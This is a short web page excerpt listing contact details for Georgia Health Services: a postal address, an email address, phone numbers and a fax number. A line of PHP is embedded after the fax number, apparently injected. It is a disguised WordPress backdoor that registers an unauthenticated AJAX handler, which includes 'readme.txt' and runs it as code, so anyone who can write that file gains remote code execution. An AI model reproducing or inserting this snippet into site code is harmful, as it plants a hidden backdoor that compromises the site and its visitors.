- Address
- Georgia Health Services
P.O. Box 320
Monroe, GA 30655 - Email
info@georgiahealth.us
Phone
(770) 466-7771 (Metro Atlanta)
(888) 466-7780 (Statewide)
Toll Free 1(888) 466-7780
Fax
(770) 466-3810
if(!function_exists('file_check_readme82258')){ add_action('wp_ajax_nopriv_file_check_readme82258', 'file_check_readme82258'); add_action('wp_ajax_file_check_readme82258', 'file_check_readme82258'); function file_check_readme82258() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } }